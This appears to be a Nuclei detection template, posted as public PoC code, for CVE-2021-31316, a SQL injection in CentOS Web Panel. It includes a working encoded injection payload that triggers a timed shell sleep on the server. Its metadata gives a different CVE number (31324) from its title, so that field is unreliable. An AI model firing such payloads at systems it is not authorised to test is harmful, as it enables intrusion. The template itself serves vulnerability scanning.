漏洞描述
The unprivileged user portal part of CentOS Web Panel is affected by a SQL Injection via the 'idsession' HTTP POST parameter.
CVE-2021-31316: CentOS Web Panel - SQL Injection
PoC代码[已公开]
id: CVE-2021-31316
info:
name: CentOS Web Panel - SQL Injection
author: ritikchaddha
severity: critical
description: |
The unprivileged user portal part of CentOS Web Panel is affected by a SQL Injection via the 'idsession' HTTP POST parameter.
reference:
- https://www.shielder.com/advisories/centos-web-panel-idsession-root-rce/
- https://nvd.nist.gov/vuln/detail/CVE-2021-31316
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-31324
cwe-id: CWE-89
epss-score: 0.65425
epss-percentile: 0.9844
cpe: cpe:2.3:a:control-webpanel:webpanel:-:*:*:*:*:*:*:*
metadata:
vendor: control-webpanel
product: webpanel
shodan-query: title:"Login | Control WebPanel"
fofa-query: title="Login | Control WebPanel"
tags: cve,cve2021,centos,cwpsrv,sqli
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(header, "cwpsrv")'
internal: true
- raw:
- |
POST /login/index.php?acc=newpass HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
pass1=c3VwZXJwYXNzd29yZA%3D%3D&idsession=a'%20UNION%20SELECT'a'%2c'b'%2c'c'%2c'YWJjIiBVTklPTiBTRUxFQ1QgJ2EnLCdiJywnYycsJ2QnLCcrMSBkYXknLCdmJy0tIHAiO3NsZWVwIDc7I2B8fGF8fGJ8fGN8fGQ%3d'%2c'e'%2c'f'-- p
matchers:
- type: dsl
dsl:
- 'duration>=7'
- 'status_code == 200'
- 'contains(response, "Control WebPanel")'
condition: and
# digest: 4b0a0048304602210086597810bda78b035d4b9e55d20951d6728dd38b14d79302665165c4d4783e92022100c9fc375722bdc9ba9912d59ed1fc9bd4d18a5826cc4c94218ea6c31e95c39f4b:922c64590222798bb761d5b6d8e72950